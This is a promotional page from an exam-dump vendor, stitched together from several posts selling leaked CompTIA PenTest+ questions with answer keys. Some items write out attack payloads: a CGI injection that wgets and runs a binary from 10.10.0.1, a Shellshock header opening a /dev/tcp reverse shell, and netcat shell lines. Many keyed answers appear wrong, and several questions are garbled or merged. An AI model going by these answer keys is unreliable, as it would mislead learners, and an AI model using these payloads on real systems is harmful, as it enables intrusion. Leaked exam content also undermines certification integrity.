Is CompTIA PT0-001 PenTest PLUS exam dumps really effective

of course. First of all, you should know about Lead4Pass. This is a store with many years of experience.
Lead4Pass has helped many customers succeed. CompTIA PT0-001 exam “CompTIA PenTest+ Exam”.
This is among all our certification exam questions One of the exam items! Lead4Pass has a full range of CompTIA exam dumps.
If you want to quickly obtain other exam certifications, you can directly click Lead4pass Exam Dumps (PDF + VCE) to search for the exam code you want!
You can also practice and test on this site! CompTIA PT0-001 exam dumps contain two learning modes: PDF and VCE, you can choose any!
The latest release of CompTIA PT0-001 exam dumps https://www.lead4pass.com/pt0-001.html (258 Q&A).
All exam questions are updated to ensure that they are true and valid! Guaranteed to help you successfully pass the exam!

Lead4Pass free sharing part of CompTIA PT0-001 exam pdf

Lead4Pass shares part of the CompTIA PT0-001 exam pdf for free. Maybe you are used to pdf learning! This is how we help you learn better!
Get the complete CompTIA PT0-001 exam PDF, you can choose to visit Lead4Pass PT0-001 to get the PT0-001 PDF

CompTIA PT0-001 online practice test

You can practice the test online before choosing Lead4Pass. For the complete CompTIA PT0-001 exam dumps, please visit Lead4Pass PT0-001

QUESTION 1
A consultant is identifying versions of Windows operating systems on a network Which of the following Nmap
commands should the consultant run?
A. nmap -T4 -v -sU -iL /tmp/list.txt -Pn –script smb-system-info
B. nmap -T4 -v -iL /tmp/list .txt -Pn –script smb-os-disccvery
C. nmap -T4 -v -6 -iL /tmp/liat.txt -Pn –script smb-os-discovery -p 135-139
D. nmap -T4 -v –script smb-system-info 192.163.1.0/24
Correct Answer: B

QUESTION 2
A penetration tester is utilizing social media to gather information about employees at a company. The tester has
created a list of popular words used in employee profile s. For which of the following types of attack would this
information be used?
A. Exploit chaining
B. Session hijacking
C. Dictionary
D. Karma
Correct Answer: C

QUESTION 3
A company received a report with the following finding While on the internal network the penetration tester was able to
successfully capture SMB broadcasted user ID and password information on the network and decode this information
This allowed the penetration tester to then join their own computer to the ABC domain
Which of the following remediation\\’s are appropriate for the reported findings\\’? (Select TWO)
A. Set the Schedule Task Service from Automatic to Disabled
B. Enable network-level authentication
C. Remove the ability from Domain Users to join domain computers to the network
D. Set the netlogon service from Automatic to Disabled
E. Set up a SIEM alert to monitor Domain joined machines
F. Set “Digitally sign network communications” to Always
Correct Answer: BC

QUESTION 4
A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the
following BEST describes the abilities of the threat actor?
A. Advanced persistent threat
B. Script kiddie
C. Hacktivist
D. Organized crime
Correct Answer: B
Reference https://www.sciencedirect.com/topics/computer-science/disgruntled-employee

QUESTION 5
A penetration tester executed a vulnerability scan against a publicly accessible host and found a web server that is
vulnerable to the DROWN attack. Assuming this web server is using the IP address 127.212.31.17, which of the
following should the tester use to verify a false positive?
A. Openssl s_client -tls1_2 -connect 127.212.31.17:443
B. Openssl s_client -ss12 -connect 127.212.31.17:443
C. Openssl s_client -ss13 -connect 127.212.31.17:443
D. Openssl s_server -tls1_2 -connect 127.212.31.17:443
Correct Answer: A

QUESTION 6
A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication.
Which of the following attacks is MOST likely to succeed in creating a physical effect?
A. DNS cache poisoning
B. Record and replay
C. Supervisory server SMB
D. Blind SQL injection
Correct Answer: A

QUESTION 7
A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs arbitrary
JavaScript within an application, which sends an XMLHttpRequest, resulting in exploiting features to which only an
administrator should have access. Which of the following controls would BEST mitigate the vulnerability?
A. Implement authorization checks.
B. Sanitize all the user input.
C. Prevent directory traversal.
D. Add client-side security controls
Correct Answer: A

QUESTION 8
DRAG DROP
A technician is reviewing the following report. Given this information, identify which vulnerability can be definitively
confirmed to be a false positive by dragging the “false positive” token to the “Confirmed” column for each vulnerability
that is a false positive.
Select and Place:

compTIA pt0-001 exam questions q8

Correct Answer:

compTIA pt0-001 exam questions q8-1

QUESTION 9
Consumer-based IoT devices are often less secure than systems built for traditional desktop computers.
Which of the following BEST describes the reasoning for this?
A. Manufacturers developing IoT devices are less concerned with security.
B. It is difficult for administrators to implement the same security standards across the board.
C. IoT systems often lack the hardware power required by more secure solutions.
D. Regulatory authorities often have lower security requirements for IoT systems.
Correct Answer: A

QUESTION 10
A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization. Which
of the following techniques would be the MOST appropriate? (Select TWO)
A. Query an Internet WHOIS database.
B. Search posted job listings.
C. Scrape the company website.
D. Harvest users from social networking sites.
E. Socially engineer the corporate call center.
Correct Answer: CD

QUESTION 11
The following command is run on a Linux file system:
Chmod 4111 /usr/bin/sudo
Which of the following issues may be exploited now?
A. Kernel vulnerabilities
B. Sticky bits
C. Unquoted service path
D. Misconfigured sudo
Correct Answer: B

QUESTION 12
A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest
into a Windows application. Before beginning to test the application, which of the following should the assessor request
from the organization?
A. Sample SOAP messages
B. The REST API documentation
C. A protocol fuzzing utility
D. An applicable XSD file
Correct Answer: D

QUESTION 13
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation
with an external IP of 100.170.60.5.
Which of the following commands will test if the VPN is available?
A. fpipe.exe -1 8080 -r 80 100.170.60.5
B. ike-scan -A -t 1 –sourceip=apoof_ip 100.170.60.5
C. nmap -sS -A -f 100.170.60.5
D. nc 100.170.60.5 8080 /bin/sh
Correct Answer: B

QUESTION 14
Which of the following is the MOST comprehensive type of penetration test on a network?
A. Black box
B. White box
C. Gray box
D. Red team
E. Architecture review
Correct Answer: A
Reference: https://purplesec.us/types-penetration-testing/

QUESTION 15
A system security engineer is preparing to conduct a security assessment of some new applications. The applications
were provided to the engineer as a set that contains only JAR files. Which of the following would be the MOST detailed
method to gather information on the inner working of these applications?
A. Launch the applications and use dynamic software analysis tools, including fuzz testing
B. Use a static code analyzer on the JAR filet to look for code Quality deficiencies
C. Decompile the applications to approximate source code and then conduct a manual review
D. Review the details and extensions of the certificate used to digitally sign the code and the application
Correct Answer: A

Summarize:

You can choose PDF or VCE to purchase Lead4Pass PT0-001 exam dumps https://www.lead4pass.com/pt0-001.html.
There are two modes, you can buy according to your own learning habits! CompTIA PT0-001 test questions and answers have been updated and corrected! Guaranteed to be true and effective! Help you pass the exam 100% successfully.

ps.

Lead4Pass shares part of the CompTIA PT0-001 exam pdf for free. Maybe you are used to pdf learning! This is how we help you learn better! Get the complete CompTIA PT0-001 exam PDF, you can choose to visit Lead4Pass PT0-001 to get the PT0-001 PDF

[Aug-2021 Updated] CompTIA PT1-002 Exam Dumps Update includes PDF and SOFTWARE from Lead4Pass

The latest updated and revised CompTIA PT1-002 exam questions and answers come from Lead4Pass! Complete CompTIA PT1-002 dumps certification questions!
Welcome to download the latest Lead4Pass CompTIA PT1-002 dumps with PDF and VCE: https://www.lead4pass.com/pt1-002.html (131 Q&A)

[CompTIA PT1-002 dumps pdf] CompTIA PT1-002 dumps PDF uploaded from Braindump4it, online download provided by the latest update of Lead4pass:
https://www.braindump4it.com/wp-content/uploads/2021/07/Lead4pass-CompTIA-PenTest-Plus-PT1-002-Exam-Dumps-Braindumps-PDF-VCE.pdf

Latest update CompTIA PT1-002 exam questions and answers online practice test

QUESTION 1
DRAG DROP
You are a penetration tester reviewing a client\\’s website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button. comptia pt1-002 questions q1 comptia pt1-002 questions q1-1 comptia pt1-002 questions q1-2 comptia pt1-002 questions q1-3

Select and Place:

comptia pt1-002 questions q1-4

Correct Answer:

comptia pt1-002 questions q1-5

 

QUESTION 2
Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final
security assessment report?
A. S/MIME
B. FTPS
C. DNSSEC
D. AS2
Correct Answer: A
Reference: https://searchsecurity.techtarget.com/answer/What-are-the-most-important-email-security-protocols


QUESTION 3
A penetration tester has been given eight business hours to gain access to a client\\’s financial system. Which of the
following techniques will have the highest likelihood of success?
A. Attempting to tailgate an employee going into the client\\’s workplace
B. Dropping a malicious USB key with the company\\’s logo in the parking lot
C. Using a brute-force attack against the external perimeter to gain a foothold
D. Performing spear phishing against employees by posing as senior management
Correct Answer: C

 

QUESTION 4
A software company has hired a penetration tester to perform a penetration test on a database server. The tester has
been given a variety of tools used by the company\\’s privacy policy. Which of the following would be the BEST to use to
find vulnerabilities on this server?
A. OpenVAS
B. Nikto
C. SQLmap
D. Nessus
Correct Answer: C
Reference: https://phoenixnap.com/blog/best-penetration-testing-tools

 

QUESTION 5
When negotiating a penetration testing contract with a prospective client, which of the following disclaimers should be
included in order to mitigate liability in case of a future breach of the client\\’s systems?
A. The proposed mitigations and remediations in the final report do not include a cost-benefit analysis.
B. The NDA protects the consulting firm from future liabilities in the event of a breach.
C. The assessment reviewed the cyber key terrain and most critical assets of the client\\’s network.
D. The penetration test is based on the state of the system and its configuration at the time of assessment.
Correct Answer: D

 

QUESTION 6
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that
was utilized:
exploit = “POST “
exploit += “/cgi-bin/index.cgi?action=loginandPath=%27%0A/bin/sh${IFS} –
c${IFS}\\’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache\\’%
0A%27andloginUser=aandPwd=a” exploit += “HTTP/1.1”
Which of the following commands should the penetration tester run post-engagement?
A. grep –v apache ~/.bash_history > ~/.bash_history
B. rm –rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM “apache” /F
Correct Answer: B

 

QUESTION 7
Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the
character sets represented Each password may be used only once.
Select and Place:

comptia pt1-002 questions q7

Correct Answer:

comptia pt1-002 questions q7-1

 

QUESTION 8
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
A. NDA
B. MSA
C. SOW
D. MOU
Correct Answer: C

 

QUESTION 9
A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A
penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to
the IaaS component of the client\\’s VM. Which of the following cloud attacks did the penetration tester MOST likely
implement?
A. Direct-to-origin
B. Cross-site scripting
C. Malware injection
D. Credential harvesting
Correct Answer: A

 

QUESTION 10
Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:
A. devices produce more heat and consume more power.
B. devices are obsolete and are no longer available for replacement.
C. protocols are more difficult to understand.
D. devices may cause physical world effects.
Correct Answer: C
Reference: https://www.hindawi.com/journals/scn/2018/3794603/

 

QUESTION 11
A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the
following:
Pre-engagement interaction (scoping and ROE) Intelligence gathering (reconnaissance) Threat modeling Vulnerability
analysis Exploitation and post exploitation Reporting
Which of the following methodologies does the client use?
A. OWASP Web Security Testing Guide
B. PTES technical guidelines
C. NIST SP 800-115
D. OSSTMM
Correct Answer: B
Reference: https://kirkpatrickprice.com/blog/stages-of-penetration-testing-according-to-ptes/

 

QUESTION 12
A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to
exploit the NETBIOS name service?
A. arPspoof
B. nmap
C. responder
D. burpsuite
Correct Answer: B
Reference: http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows/

 

QUESTION 13
A penetration tester conducted a vulnerability scan against a client\\’s critical servers and found the following:comptia pt1-002 questions q13

Which of the following would be a recommendation for remediation?
A. Deploy a user training program
B. Implement a patch management plan
C. Utilize the secure software development life cycle
D. Configure access controls on each of the servers
Correct Answer: B

 

QUESTION 14
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the
target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this
objective?
A. Wait for the next login and perform a downgrade attack on the server.
B. Capture traffic using Wireshark.
C. Perform a brute-force attack over the server.
D. Use an FTP exploit against the server.
Correct Answer: B
Reference: https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b

 

QUESTION 15
Which of the following documents BEST describes the manner in which a security assessment will be conducted?
A. BIA
B. SOW
C. SLA
D. MSA
Correct Answer: A


Update the latest valid CompTIA PT1-002 test questions and answers throughout the year.
Upload the latest PT1-002 exam practice questions and PT1-002 PDF for free every month. Get the complete PT1-002 Exam Dumps, the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass PT1-002 Dumps (including PDF and SOFTWARE),
please visit: https://www.lead4pass.com/pt1-002.html (131 Q&A)

ps. Get free CompTIA PT1-002 dumps PDF online: https://www.braindump4it.com/wp-content/uploads/2021/07/Lead4pass-CompTIA-PenTest-Plus-PT1-002-Exam-Dumps-Braindumps-PDF-VCE.pdf

[July-2021 Updated] CompTIA PT0-001 Brain Dumps Update includes PDF and VCE from Lead4Pass

The latest updated and revised CompTIA PT0-001 exam questions and answers come from Lead4Pass! Complete CompTIA PT0-001 dumps certification questions!
Welcome to download the latest Lead4Pass CompTIA PT0-001 dumps with PDF and VCE: https://www.lead4pass.com/pt0-001.html (258 Q&A)

[CompTIA PT0-001 dumps pdf] CompTIA PT0-001 dumps PDF uploaded from google drive, online download provided by the latest update of Lead4pass:
https://drive.google.com/file/d/1DHqsHNHXdDwNVKJDECqB8p-YwM4rkz1t/

Latest update CompTIA PT0-001 exam questions and answers online practice test

QUESTION 1
A penetration tester is performing an annual security assessment for a repeat client The tester finds indicators of
previous compromise Which of the following would be the most logical steps to follow NEXT?
A. Report the incident to the tester\\’s immediate manager and follow up with the client immediately
B. Report the incident to the clients Chief Information Security Officer (CISO) immediately and alter the terms of
engagement accordingly
C. Report the incident to the client\\’s legal department and then follow up with the client\\’s security operations team
D. Make note of the anomaly, continue with the penetration testing and detail it in the final report
Correct Answer: A

 

QUESTION 2
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to
manage power generation and cooling. Which of the following is a consideration unique to such an environment that
must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
Correct Answer: A

 

QUESTION 3
A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following
command:
for m in {1..254..1};do ping -c 1 192.168.101.$m; done
Which of the following BEST describes the result of running this command?
A. Port scan
B. Service enumeration
C. Live host identification
D. Denial of service
Correct Answer: C

 

QUESTION 4
During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically
engaging them?
A. Locating emergency exits
B. Preparing a pretext
C. Shoulder surfing the victim
D. Tailgating the victim
Correct Answer: B

 

QUESTION 5
A company has engaged a penetration tester to perform an assessment for an application that resides in the
company\\’s DMZ. Prior to conducting testing, in which of the following solutions should the penetration tester\\’s IP
address be whitelisted?
A. WAF
B. HIDS
C. NIDS
D. DLP
Correct Answer: C

 

QUESTION 6
A penetration tester is perform initial intelligence gathering on some remote hosts prior to conducting a vulnerability
A. The network is submitted as a /25 or greater and the tester needed to access hosts on two different subnets
B. The tester is trying to perform a more stealthy scan by including several bogus addresses
C. The scanning machine has several interfaces to balance the scan request across at the specified rate
D. A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the
latter host.
Correct Answer: B


QUESTION 7
A penetration tester is reviewing the following output from a wireless sniffer:microsoft pt0-001 exam questions q7

Which of the following can be extrapolated from the above information?
A. Hardware vendor
B. Channel interference
C. Usernames
D. Key strength
Correct Answer: C

 

QUESTION 8
A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the
finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings?
A. Ensure the scanner can make outbound DNS requests.
B. Ensure the scanner is configured to perform ARP resolution.
C. Ensure the scanner is configured to analyze IP hosts.
D. Ensure the scanner has the proper plug -ins loaded.
Correct Answer: A

 

QUESTION 9
A penetration tester ran an Nmap scan against a target and received the following output:microsoft pt0-001 exam questions q9

Which of the following commands would be best for the penetration tester to execute NEXT to discover any weaknesses
or vulnerabilities?
A. onesixtyone ? 192.168.121.1
B. enum4linux ? 192.168.121.1
C. snmpwalk ? public 192.168.121.1
D. medusa ? 192.168.121.1 ? users.txt ? passwords.txt ? ssh
Correct Answer: C

 

QUESTION 10
During a penetration test, a tester identifies traditional antivirus running on the exploited server. Which of the following
techniques would BEST ensure persistence in a post-exploitation phase?
A. Shell binary placed in C:\windows\temp
B. Modified daemons
C. New user creation
D. Backdoored executables
Correct Answer: B

 

QUESTION 11
A penetration tester has run multiple vulnerability scans against a target system. Which of the following would be unique
to a credentialed scan?
A. Exploits for vulnerabilities found
B. Detailed service configurations
C. Unpatched third-party software
D. Weak access control configurations
Correct Answer: A

 

QUESTION 12
After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the
attacker\\’s actual fingerprint without exploitation. Which of the following is the MOST likely of what happened?
A. The biometric device is tuned more toward false positives
B. The biometric device is configured more toward true negatives
C. The biometric device is set to fail closed
D. The biometnc device duplicated a valid user\\’s fingerpnnt.
Correct Answer: A

 

QUESTION 13
Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security
assessment an example of?
A. Lockpicking
B. Egress sensor triggering
C. Lock bumping
D. Lock bypass
Correct Answer: D
Reference: https://www.triaxiomsecurity.com/2018/08/16/physical-penetration-test- examples/


Update the latest valid CompTIA PT0-001 test questions and answers throughout the year.
Upload the latest PT0-001 exam practice questions and PT0-001 PDF for free every month. Get the complete PT0-001 Brain Dumps,
the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass PT0-001 Dumps (including PDF and VCE),
please visit: https://www.lead4pass.com/pt0-001.html (PDF + VCE)

ps. Get free CompTIA PT0-001 dumps PDF online: https://drive.google.com/file/d/1DHqsHNHXdDwNVKJDECqB8p-YwM4rkz1t/

[2021.7 Updated] Valid Lead4Pass CompTIA PT1-002 exam questions with VCE and PDF download

New updated CompTIA PT1-002 exam questions from Lead4Pass CompTIA PT1-002 dumps!
Welcome to download the latest Lead4Pass CompTIA PT1-002 dumps with PDF and VCE: https://www.lead4pass.com/pt1-002.html (131 Q&As)

[CompTIA PT1-002 exam pdf] CompTIA PT1-002 exam PDF uploaded from google drive, online download provided by the latest update of Lead4pass:
https://drive.google.com/file/d/1jfu5vT3U5z0UcbNIL1v2QvLxF4MJj7E4/

Latest update CompTIA PT1-002 exam questions and answers online practice test

QUESTION 1
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
A. NDA
B. MSA
C. SOW
D. MOU
Correct Answer: C

 

QUESTION 2
An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the
application\\’s network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The application log files
indicate secure SSL/TLS connections are failing. Which of the following is MOST likely preventing proxying of all traffic?
A. Misconfigured routes
B. Certificate pinning
C. Strong cipher suites
D. Closed ports
Correct Answer: B

 

QUESTION 3
A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the
following:
Pre-engagement interaction (scoping and ROE) Intelligence gathering (reconnaissance) Threat modeling Vulnerability
analysis Exploitation and post exploitation Reporting
Which of the following methodologies does the client use?
A. OWASP Web Security Testing Guide
B. PTES technical guidelines
C. NIST SP 800-115
D. OSSTMM
Correct Answer: B
Reference: https://kirkpatrickprice.com/blog/stages-of-penetration-testing-according-to-ptes/


QUESTION 4
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some
of the files that were discovered through this vulnerability are: Which of the following is the BEST method to help an
attacker gain internal access to the affected machine?comptia pt1-002 exam questions q4

A. Edit the discovered file with one line of code for remote callback
B. Download .pl files and look for usernames and passwords
C. Edit the smb.conf file and upload it to the server
D. Download the smb.conf file and look at configurations
Correct Answer: C

 

QUESTION 5
When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified.
Which of the following character combinations should be used on the first line of the script to accomplish this goal?
A. and1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
Which of the following edits should the tester make to the script to determine the user context in which the server is
being run?
A. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
B. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>and find / -perm -4000”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
C. exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>and1”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
D. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>and /dev/tcp/10.10.1.1/80” 0>and1”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
Correct Answer: D

 

QUESTION 6
A manager calls upon a tester to assist with diagnosing an issue within the following:
Python script: #!/usr/bin/python s = “Administrator”
The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and
drop the correct output for each string manipulation to its corresponding code segment Options may be used once or
not at all.
Select and Place:comptia pt1-002 exam questions q6

Correct Answer:

comptia pt1-002 exam questions q6-1


The above content: shared PT1-002 exam pdf, PT1-002 Exam Questions And Answers, PT1-002 exam video, and get the complete PT1-002 exam dumps path.
For information about PT1-002 Dumps from Lead4pass (including PDF and VCE), please visit: https://www.lead4pass.com/pt1-002.html (131 Q&A)

ps. Get free CompTIA PT1-002 dumps PDF online: https://drive.google.com/file/d/1jfu5vT3U5z0UcbNIL1v2QvLxF4MJj7E4/

[2021.6 Updated] Valid Lead4Pass CompTIA PT0-001 exam questions with VCE and PDF download

New updated CompTIA PT0-001 exam questions from Lead4Pass CompTIA PT0-001 dumps!
Welcome to download the latest Lead4Pass CompTIA PT0-001 dumps with PDF and VCE: https://www.lead4pass.com/pt0-001.html (258 Q&As)

[CompTIA PT0-001 exam pdf] CompTIA PT0-001 exam PDF uploaded from google drive, online download provided by the latest update of Lead4pass:
https://drive.google.com/file/d/1rfz-nYT6oozCfgfDN_8S0kqw3-3IWNG2/

[CompTIA PT0-001 Youtube] CompTIA PT0-001 exam questions and answers are shared free of charge from Youtube watching uploads from Lead4pass.

Latest update CompTIA PT0-001 exam questions and answers online practice test

QUESTION 1
Which of the following can be used to perform online password attacks against RDP?
A. Hashcat
B. John the Rippef
C. Aircrack-ng
D. Ncrack
Correct Answer: D

 

QUESTION 2
During an engagement, an unsecured direct object reference vulnerability was discovered that allows the extraction of
highly sensitive PII. The tester is required to extract and then exfil the information from a web application with identifiers
1 through 1000 inclusive. When running the following script, an error is encountered:comptia pt0-001 certification exam q2

Which of the following lines of code is causing the problem?
A. url = “https://www.comptia.org?id=”
B. req = requests.get(url)
C. if req.status ==200:
D. url += i
Correct Answer: D

 

QUESTION 3
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and
display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
A. From the remote computer, run the following commands: Export IHOST 192.168.1.10:0.0 xhost+ Terminal
B. From the local computer, run the following command ssh -L4444: 127.0.01:6000 -% [email protected] xterm
C. From the local computer, run the following command ssh -r6000: 127.0.01:4444 -p 6000 [email protected]
“xhost+; xterm”
D. From the local computer, run the following command: NC -lp 6000 Then, from the remote computer, run the following command: xterm | NC 192.168.1.10 6000
Correct Answer: D

 

QUESTION 4
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single
workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).
A. Randomize local administrator credentials for each machine.
B. Disable remote logins for local administrators.
C. Require multifactor authentication for all logins.
D. Increase minimum password complexity requirements.
E. Apply additional network access control.
F. Enable full-disk encryption on every workstation.
G. Segment each host into its own VLAN.
Correct Answer: CDE

 

QUESTION 5
A penetration tester observes that several high numbered ports are listening on a public webserver. However, the
system owner says the application only uses port 443. Which of the following would be BEST to recommend?
A. Transition the application to another port
B. Filter port 443 to specific IP addresses
C. Implement a web application firewall
D. Disable unneeded services.
Correct Answer: D

 

QUESTION 6
A penetration tester discovers an anonymous FTP server that is sharing the C:\drive. Which of the following is the BEST
exploit?
A. Place a batch script in the startup folder for all users.
B. Change a service binary location path to point to the tester\\’s own payload.
C. Escalate the tester\\’s privileges to SYSTEM using the at.exe command.
D. Download, modify and reupload a compromised registry to obtain code execution.
Correct Answer: B

 

QUESTION 7
Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the
character sets represented Each password may be used only once.
Select and Place:

comptia pt0-001 certification exam q7

Correct Answer:

comptia pt0-001 certification exam q7-1

 

QUESTION 8
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon
discovering vulnerabilities, the company asked the consultant to perform the following tasks:
1.
Code review
2.
Updates to firewall settings
Which of the following has occurred in this situation?
A. Scope creep
B. Post-mortem review
C. Risk acceptance
D. Threat prevention
Correct Answer: A

QUESTION 9
Which of the following commands starts the Metasploit database?
A. msfconsole
B. workspace
C. msfvenom
D. db_init
E. db_connect
Correct Answer: A
References: https://www.offensive-security.com/metasploit-unleashed/msfconsole/

 

QUESTION 10
A penetration tester is performing a code review against a web application Given the following URL and source code:comptia pt0-001 certification exam q10

Which of the following vulnerabilities is present in the code above?
A. SQL injection
B. Cross-site scripting
C. Command injection
D. LDAP injection
Correct Answer: C

 

QUESTION 11
A consultant is identifying versions of Windows operating systems on a network Which of the following Nmap
commands should the consultant run?
A. nmap -T4 -v -sU -iL /tmp/list.txt -Pn –script smb-system-info
B. nmap -T4 -v -iL /tmp/list .txt -Pn –script smb-os-disccvery
C. nmap -T4 -v -6 -iL /tmp/liat.txt -Pn –script smb-os-discovery -p 135-139
D. nmap -T4 -v –script smb-system-info 192.163.1.0/24
Correct Answer: B

 

QUESTION 12
Which of the following situations would cause a penetration tester to communicate with a system owner/client during the
course of a test? (Select TWO)
A. The tester discovers personally identifiable data on the system
B. The system shows evidence of prior unauthorized compromise
C. The system shows a lack of hardening throughout
D. The system becomes unavailable following an attempted exploit
E. The tester discovers a finding on an out-of-scope system
Correct Answer: BD

 

QUESTION 13
A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the
following is the MOST efficient to utilize?
A. nmap -p 53 -oG dnslist.txt | cut -d “:” -f 4
B. nslookup -ns 8.8.8.8 echo “8.8.8.8” >> /etc/resolv/conf
Correct Answer: A


The above content: shared PT0-001 exam pdf, PT0-001 Exam Questions And Answers, PT0-001 exam video, and get the complete PT0-001 exam dump path.
For information about PT0-001 Dumps from Lead4pass (including PDF and VCE), please visit: https://www.lead4pass.com/pt0-001.html (258 Q&A)

ps.
Get free CompTIA PT0-001 dumps PDF online: https://drive.google.com/file/d/1rfz-nYT6oozCfgfDN_8S0kqw3-3IWNG2/